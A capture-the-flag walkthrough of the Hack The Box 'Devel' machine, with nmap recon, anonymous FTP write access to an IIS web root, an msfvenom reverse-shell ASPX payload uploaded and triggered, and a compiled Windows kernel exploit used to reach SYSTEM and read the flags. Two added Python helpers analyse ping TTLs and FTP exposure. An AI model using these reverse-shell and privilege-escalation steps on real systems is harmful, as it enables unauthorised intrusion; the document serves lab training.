Create a directory for the machine on the Desktop, which will also hold the nmap scans, and add the host name to /etc/hosts:
echo " devel.htb" >> /etc/hosts
mkdir htb/devel.htb
cd htb/devel.htb
I prefer to start recon by pinging the target; this checks connectivity and gives a first hint about the OS.
ping -c 3 devel.htb
PING devel.htb ( 56(84) bytes of data.
64 bytes from devel.htb ( icmp_seq=1 ttl=127 time=57.1 ms
64 bytes from devel.htb ( icmp_seq=2 ttl=127 time=53.6 ms
64 bytes from devel.htb ( icmp_seq=3 ttl=127 time=56.2 ms
From these three ICMP replies we see that the Time To Live (TTL) is 127, i.e. an initial value of ~128, which indicates that the target is a Windows system; *nix systems usually start with a TTL of 64.
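As an added illustration (not part of the original writeup), the following Python turns the TTL heuristic above into code: it parses ping reply lines, picks the nearest well-known initial TTL and estimates the hop count. The OS-family table is my assumption, and the sample lines are copied from the ping output above; treat the result as a hint, since a firewall or tunnel can rewrite TTLs.

```python
import re

# Well-known initial TTL values by OS family (heuristic defaults, not guarantees).
INITIAL_TTLS = {64: "Linux/Unix", 128: "Windows", 255: "Network device / Solaris"}

# Matches one reply line of Linux `ping`, e.g. "... icmp_seq=1 ttl=127 time=57.1 ms".
PING_REPLY = re.compile(r"icmp_seq=(\d+) ttl=(\d+) time=([\d.]+) ms")

def infer_initial_ttl(observed_ttl):
    """Return (initial_ttl, hops, os_guess) for an observed TTL.

    Each router decrements the TTL by one, so the sender's initial TTL is the
    smallest well-known default that is >= the observed value.
    """
    for initial in sorted(INITIAL_TTLS):
        if observed_ttl <= initial:
            return initial, initial - observed_ttl, INITIAL_TTLS[initial]
    raise ValueError("TTL cannot exceed 255")

def analyse_ping_output(text):
    """Parse ping reply lines and summarise what the TTL suggests about the target."""
    ttls = [int(m.group(2)) for m in PING_REPLY.finditer(text)]
    if not ttls:
        return None
    if len(set(ttls)) != 1:
        # Replies with different TTLs usually mean load balancing or a changing path.
        return {"replies": len(ttls), "ttls": sorted(set(ttls)), "os_guess": "inconsistent"}
    initial, hops, os_guess = infer_initial_ttl(ttls[0])
    return {"replies": len(ttls), "observed_ttl": ttls[0], "initial_ttl": initial,
            "hops": hops, "os_guess": os_guess}

# Reply lines copied from the ping output above (the host IP is omitted there as well).
SAMPLE_PING = """\
64 bytes from devel.htb ( icmp_seq=1 ttl=127 time=57.1 ms
64 bytes from devel.htb ( icmp_seq=2 ttl=127 time=53.6 ms
64 bytes from devel.htb ( icmp_seq=3 ttl=127 time=56.2 ms
"""

if __name__ == "__main__":
    print(analyse_ping_output(SAMPLE_PING))
```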
nmap --open -p0- -n -Pn -vvv --min-rate 5000 devel.htb -oG port_scan
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 15:32 EDT
Initiating SYN Stealth Scan at 15:32
Scanning devel.htb ( [65536 ports]
Discovered open port 80/tcp on
Discovered open port 21/tcp on
Completed SYN Stealth Scan at 15:32, 26.41s elapsed (65536 total ports)
Nmap scan report for devel.htb (
Host is up, received user-set (0.057s latency).
Scanned at 2023-07-24 15:32:23 EDT for 26s
Not shown: 65534 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
21/tcp open ftp syn-ack ttl 127
80/tcp open http syn-ack ttl 127
Two ports are open on the machine: 21 and 80.
Now we need to identify which services are running on them, looking in detail at port 21:
nmap -p21,80 -n -Pn -vvv -sCV --min-rate 5000 devel.htb -oN open_ports
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 07-24-23 11:15AM 241062 40564.exe
| 03-18-17 02:06AM <DIR> aspnet_client
| 07-24-23 01:26AM 1442 cmdasp.aspx
| 07-24-23 12:36AM 2914 devel.aspx
| 07-24-23 01:04AM 2886 devel1.aspx
| 07-24-23 04:44PM 2917 devel2.aspx
| 07-24-23 02:11AM 2749 develshell.aspx
| 07-24-23 11:09AM 15966 fox.aspx
| 07-24-23 09:26AM 2906 hacked.aspx
| 03-17-17 05:37PM 689 iisstart.htm
| 07-24-23 07:16PM 0 killbill.aspx
| 07-24-23 07:21PM 2912 killbill1.aspx
| 07-24-23 12:17AM 2783 pwned.aspx
| 07-24-23 03:00PM 2923 rev.aspx
| 07-24-23 09:21PM 15969 shell.aspx
| 07-24-23 03:34PM 73802 virus.exe
| 07-24-23 12:34AM 112815 virus2.exe
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods:
|_ Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
ftp devel.htb
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel.htb:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
ftp> help
Commands may be abbreviated. Commands are:
! cr ftp macdef msend prompt restart sunique
$ debug gate mdelete newer proxy rhelp system
account delete get mdir nlist put rmdir tenex
append dir glob mget nmap pwd rstatus throttle
ascii disconnect hash mkdir ntrans quit runique trace
bell edit help mls open quote send type
binary epsv idle mlsd page rate sendport umask
bye epsv4 image mlst passive rcvbuf set unset
case epsv6 lcd mode pdir recv site usage
cd exit less modtime pls reget size user
cdup features lpage more pmlsd remopts sndbuf verbose
chmod fget lpwd mput preserve rename status xferbuf
close form ls mreget progress reset struct ?
We can use the put command to upload a single file.
Let's try it over ftp with the nmap result file (port_scan), then list the directory to confirm the upload:
ftp> ls
229 Entering Extended Passive Mode (|||49220|)
125 Data connection already open; Transfer starting.
07-24-23 11:15AM 241062 40564.exe
03-18-17 02:06AM <DIR> aspnet_client
07-24-23 01:26AM 1442 cmdasp.aspx
07-24-23 12:36AM 2914 devel.aspx
07-24-23 01:04AM 2886 devel1.aspx
07-24-23 04:44PM 2917 devel2.aspx
07-24-23 02:11AM 2749 develshell.aspx
07-24-23 11:09AM 15966 fox.aspx
07-24-23 09:26AM 2906 hacked.aspx
03-17-17 05:37PM 689 iisstart.htm
07-24-23 07:16PM 0 killbill.aspx
07-24-23 07:21PM 2912 killbill1.aspx
07-24-23 10:57PM 464 port_scan
07-24-23 12:17AM 2783 pwned.aspx
07-24-23 03:00PM 2923 rev.aspx
07-24-23 09:21PM 15969 shell.aspx
07-24-23 03:34PM 73802 virus.exe
07-24-23 12:34AM 112815 virus2.exe
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
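The listings above show the core weakness of this box: the anonymous FTP root is the IIS web root, and our upload of port_scan proves it is writable. As an added example (not part of the original writeup), this Python parses Microsoft FTP directory listings, either raw or as nmap's ftp-anon output, and rates the exposure the way an auditor would; the IIS default-file markers and the extension list are assumptions I chose.

```python
import re

# One line of a Microsoft FTP (MS-DOS style) listing, optionally prefixed by nmap's "| " / "|_".
LISTING_LINE = re.compile(
    r"^\|?_?\s*(\d{2}-\d{2}-\d{2})\s+(\d{2}:\d{2}[AP]M)\s+(<DIR>|\d+)\s+(\S+)$")

# Files IIS ships in its default web root; seeing them at the FTP root suggests the FTP
# service is rooted in the web root (assumed marker set).
IIS_WEBROOT_MARKERS = {"iisstart.htm", "welcome.png", "aspnet_client"}
# Content the IIS worker process executes server-side, or a user can run directly.
EXECUTABLE_EXTENSIONS = (".aspx", ".asp", ".ashx", ".asmx", ".exe", ".dll")

def parse_listing(text):
    """Return [(name, is_dir, size_bytes)] for every listing line found in text."""
    entries = []
    for line in text.splitlines():
        m = LISTING_LINE.match(line.strip())
        if m:
            size_field, name = m.group(3), m.group(4)
            is_dir = size_field == "<DIR>"
            entries.append((name, is_dir, 0 if is_dir else int(size_field)))
    return entries

def assess_anonymous_ftp(listing_text, uploaded_marker=None):
    """Rate the exposure: anonymous read of a web root is high, anonymous write is critical."""
    names = {name for name, _, _ in parse_listing(listing_text)}
    anonymous = ("Anonymous FTP login allowed" in listing_text
                 or "230 User logged in" in listing_text)
    findings = {
        "anonymous_login": anonymous,
        "looks_like_iis_webroot": bool(names & IIS_WEBROOT_MARKERS),
        "executable_files": sorted(n for n in names if n.lower().endswith(EXECUTABLE_EXTENSIONS)),
        # A file we uploaded ourselves showing up in the listing proves write access.
        "anonymous_write_confirmed": bool(uploaded_marker) and uploaded_marker in names,
    }
    if anonymous and findings["looks_like_iis_webroot"]:
        findings["severity"] = "critical" if findings["anonymous_write_confirmed"] else "high"
    else:
        findings["severity"] = "info"
    return findings

# A subset of the nmap ftp-anon output above, kept short for the example.
FTP_ANON_SAMPLE = """\
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 07-24-23 01:26AM 1442 cmdasp.aspx
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
"""
```

Feeding the post-upload `ls` output with `uploaded_marker="port_scan"` raises the rating to critical; the fix on the server side is to stop the FTP site sharing the web root and to remove anonymous write permission.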
2.5 - Which metasploit reconnaissance module can be used to list possible privilege escalation paths on a compromised system?
We launch msfconsole and search for a post/multi/recon module:
search post/multi/recon
Now we can use msfvenom to generate a reverse-shell payload to upload over ftp:
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=444 -f aspx > exploit.aspx
Payload size: 327 bytes
Final size of aspx file: 2748 bytes
LHOST is our local IP, while LPORT is the port on which we'll listen with netcat.
ftp> put script.aspx
local: script.aspx remote: script.aspx
229 Entering Extended Passive Mode (|||49224|)
125 Data connection already open; Transfer starting.
100% |**************************************************************| 2748 1.12 MiB/s --:-- ETA
226 Transfer complete.
2748 bytes sent in 00:00 (45.20 KiB/s)
Now we can start a netcat listener on port 444 and run the script:
iis apppool\web
We're the iis apppool\web user; the flag is probably on the babis user's desktop.
We don't have access to babis' directory, so we try to find the "user.txt" flag with the where command from the C:\ root:
where /r C:\ user.txt
No result. Now we need to escalate privileges to get access to babis' directory.
We run the systeminfo command to get information about the OS:
OS Version: 6.1.7600 N/A Build 7600
Searching on Google we found an exploit for this OS version.
We download this script, "40564.c", and compile it with mingw32:
i686-w64-mingw32-gcc 40564.c -o exploit.exe -lws2_32
Now we can reconnect over ftp in binary mode and upload it (exploit.exe).
We can locate exploit.exe with the where command and run it to escalate privileges:
where /r C:\ exploit.exe
nt authority\system
Starting from the root folder (C:\), we can quickly find the flags using the where command in recursive mode (/r):
where /r C:\ user.txt
and read the user.txt flag using the type command (equivalent to cat on *nix):
type C:\Users\babis\Desktop\user.txt
After that, we do the same for the root.txt flag:
where /r C:\ root.txt
type C:\Users\Administrator\Desktop\root.txt
